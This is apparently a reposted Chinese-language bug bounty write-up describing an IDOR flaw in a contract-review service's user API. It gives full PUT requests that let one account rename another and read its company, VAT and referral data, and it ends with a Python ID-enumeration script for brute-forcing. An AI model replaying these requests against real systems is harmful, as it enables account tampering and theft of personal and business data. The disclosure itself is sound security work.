IDOR 导致数据泄露和配置文件更新- 错误赏金- 0x00sec

Updated on 2月 26, 2024 in 漏洞赏金
0 on 7月 1, 2023

在我的另一次错误赏金会议上,我遇到了一家“Contract Review”公司的赏金计划。

在他们的网络应用程序中,人们可以使用名字/姓氏、电子邮件和公司名称(以及密码ofc)进行注册。

在尝试弄清楚该网络应用程序的工作原理后,我更新了我的个人资料,将我的名字从“vict0ni”更改为“vict0ni1337”。我捕获了请求:

OPTIONS /users/5e335fafedd93a1f35b6ca27 HTTP/1.1
Host: clientapi.website.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en,en-US;q=0.7,de;q=0.3
Accept-Encoding: gzip, deflate
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: authorization,content-type
Origin: https://app.website.com
Connection: close

其次是:

PUT /users/5e335fafedd93a1f35b6ca27 HTTP/1.1
Host: clientapi.website.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en,en-US;q=0.7,de;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2KyIjoiNWUzMzVmYWZlZGQ5M2UxZjM1YjZjYTI3IiwiaWF0IjoxNTgwNDk1MDQ3LCJleHAiOjE1NTM3MjQ5NTA0N30.LM8jJM46ZvFPwlzJ9hezXf_W0oOSpgvfpOastWU7UZA
Content-Length: 188
Origin: https://app.website.com
Connection: close

{"user":{"firstName":"vict0ni1337","lastName":"0x00sec","email":"[email protected]","password":null,"dismissedGuides":{"contractHelpPopup":false},"company":"5e335faeedd93a1f35b6ca26"}}

得到这个响应:

HTTP/1.1 200 OK
Date: Thu, 06 Feb 2020 13:43:35 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 948
Connection: close
Set-Cookie: __cfduid=db2571d1ac9e83a96ca3265b9a0bf1d4c1580996613; expires=Sat, 07-Mar-20 13:43:33 GMT; path=/; domain=.website.com; HttpOnly; SameSite=Lax
Access-Control-Allow-Origin: https://app.website.com
ETag: W/"3b4-QbbUm9x0qtqg3/Bqcixd7mbQgqw"
Vary: Origin, Accept-Encoding
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 560d8dc0581c4098-HAM

{"users":[{"contracts":[],"createdAt":1580425135972,"updatedAt":1580996613958,"id":"5e335fafedd93a1f35b6ca27","email":"[email protected]","firstName":"vict0ni1337","lastName":"0x00sec","role":"admin","resetPasswordTokenExpires":0,"dismissedGuides":{"contractHelpPopup":false},"dripId":"3measgw3gr1yjpgvddqn","deleted":false,"master":false,"lastLogoutDate":0,"company":"5e335faeedd93a1f35b6ca26"}],"companies":[{"createdAt":1580425133542,"updatedAt":1580428552059,"id":"5e335faeedd93a1f35b6ca26","name":"BugBounty","seq":5119,"vatId":"","phone":"1337","country":null,"employeeCount":"","singleReviewsAvailable":3,"monthlyReviewsAvailable":0,"referredByCode":"","referralCode":"zqpwr","referralExtraCredits":0,"subscription":{"id":"16A1DGRp7Up0s1Qu7","planId":"website-basic","planName":"website Basic"},"emailInAddress":"","links":{"users":"/companies/5e335faeedd93a1f35b6ca26/users","contracts":"/companies/5e335faeedd93a1f35b6ca26/contracts"}}]}

所以我发出了一个OPTIONS 请求,然后使用我的个人userID 发出了一个PUT 请求 5e335fafedd93a1f35b6ca27 更新我的名字(只能更改名字和姓氏)并使用200 HTTP 响应以及有关我的帐户和公司的大量信息进行响应。

在测试网络应用程序时,我总是创建两个帐户。我对第二个帐户做了同样的事情,只是为了获取它的用户ID。然后我想如果我在更新帐户A 的请求中使用帐户B 的userID 会发生什么。因此我做了与上述完全相同的操作,被授权为帐户A 的用户,但使用帐户B 的userID :

PUT /users/5e3c8692f3d2c616c6ed78e9 HTTP/1.1
Host: clientapi.website.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en,en-US;q=0.7,de;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2KyIjoiNWUzMzVmYWZlZGQ5M2UxZjM1YjZjYTI3IiwiaWF0IjoxNTgwNDk1MDQ3LCJleHAiOjE1NTM3MjQ5NTA0N30.LM8jJM46ZvFPwlzJ9hezXf_W0oOSpgvfpOastWU7UZA
Content-Length: 188
Origin: https://app.website.com
Connection: close

{"user":{"firstName":"vict0ni1337","lastName":"0x00sec","email":"[email protected]","password":null,"dismissedGuides":{"contractHelpPopup":false},"company":"5e335faeedd93a1f35b6ca26"}}

得到这个响应:

HTTP/1.1 200 OK
Date: Thu, 06 Feb 2020 21:38:07 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 943
Connection: close
Set-Cookie: __cfduid=d78cefde78c34008ca49d162306b8fcfb1581025085; expires=Sat, 07-Mar-20 21:38:05 GMT; path=/; domain=.website.com; HttpOnly; SameSite=Lax
Access-Control-Allow-Origin: https://app.website.com
ETag: W/"3af-ctJNYxOVotnOZ8DYR4ejpainHVE"
Vary: Origin, Accept-Encoding
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 561044dd2b4fcd93-CDG

{"users":[{"contracts":[],"createdAt":1581024914019,"updatedAt":1581025085895,"id":"5e3c8692f3d2c616c6ad78e9","email":"[email protected]","firstName":"vict0ni1337","lastName":"0x00sec","role":"admin","resetPasswordTokenExpires":0,"dismissedGuides":{"contractHelpPopup":false},"dripId":"5pjs1pjjwprphpkce0rj","deleted":false,"master":false,"lastLogoutDate":0,"company":"5e3c8690f3d2c616c6ed78e8"}],"companies":[{"createdAt":1581024911551,"updatedAt":1581024919638,"id":"5e3c8690f3d2c616c6ed78e8","name":"CompanyB","seq":5137,"vatId":"dummyVATID","phone":"1234567890","country":null,"employeeCount":"","singleReviewsAvailable":3,"monthlyReviewsAvailable":0,"referredByCode":"","referralCode":"plozx","referralExtraCredits":0,"subscription":{"id":"16BcmbRpl5Qvt1Lwv","planId":"website-basic","planName":"website Basic"},"emailInAddress":"","links":{"users":"/companies/5e3c8690f3d2c616c6ed78e8/users","contracts":"/companies/5e3c8690f3d2c616c6ed78e8/contracts"}}]}

因此,通过将userID 更改为帐户B 的userID,我可以更新帐户B 的名字和姓氏,获取其邮件、推荐代码、公司ID、订阅计划、员工人数、电话号码、公司信息 增值税识别号 等等,同时被授权为帐户A。通过推荐代码,用户可以使用它获得30 美元作为被其他用户推荐的“礼物”。

可能服务器没有识别是谁发送的 Authorization 标头,它只是确保存在有效的授权标头。

虽然这一切都很好,但每个帐户的用户ID 仍然是秘密的。必须有某种MiTM 攻击来捕获它并进行有针对性的攻击。所以我想也许我可以推广攻击,而不是针对单个帐户。
通过使用虚拟用户ID,为了测试暴力保护,我发现端点容易受到暴力攻击。由于userID 遵循某种模式(由24 个十六进制字符组成的字符串),因此可以使用以下python 脚本生成所有可能的ID 并将它们保存到文件中:

import itertools

string = '0123456789abcdef'
file = open('userIDs.txt', 'w')
for p in itertools.product(string, repeat=24):
	writing = ''.join(p) + '\n'
	file.write(writing)
file.close()

凭借足够的计算能力,攻击者可以更改所有用户的名字/姓氏并获取他们的帐户和公司信息。

谢谢阅读!

 
  • Liked by
Reply